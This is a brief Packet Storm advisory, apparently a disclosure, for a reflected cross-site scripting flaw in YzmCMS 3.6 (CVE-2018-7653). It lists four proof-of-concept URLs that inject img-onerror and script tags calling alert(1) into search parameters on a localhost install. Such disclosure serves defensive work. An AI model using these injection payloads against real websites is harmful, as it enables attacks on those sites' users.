YzmCMS 3.6 Cross Site Scripting

2018-04-05T00:00:00
ID PACKETSTORM:147065
Type packetstorm
Reporter zzw
Modified 2018-04-05T00:00:00

Description

                                        
                                            `# Exploit Title: YzmCMS 3.6 XSS Vulnerability  
# Date: 2018-04-03  
# Exploit Author: zzw (zzw@5ecurity.cn)  
# Vendor Homepage: http://www.yzmcms.com/  
# Software Link: http://www.yzmcms.com/  
# Version: 3.6  
# CVE : CVE-2018-7653  
  
This is a XSS vulnerability than can attack the users.  
  
poc:  
  
http://localhost/YzmCMS/index.php?m=search&c=index&a=initxqb4n%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecu9rs&modelid=1&q=tes   
  
http://localhost/YzmCMS/index.php?m=search&c=indexf9q6s%3cimg%20src%3da%20onerror%3dalert(1)%3ej4yck&a=init&modelid=1&q=tes   
  
http://localhost/YzmCMS/index.php?m=searchr81z4%3cimg%20src%3da%20onerror%3dalert(1)%3eo92wf&c=index&a=init&modelid=1&q=tes   
  
http://localhost/YzmCMS/index.php?m=search&c=index&a=init&modelid=1b2sgd%22%3e%3cscript%3ealert(1)%3c%2fscript%3eopzx0&q=tes  
  
`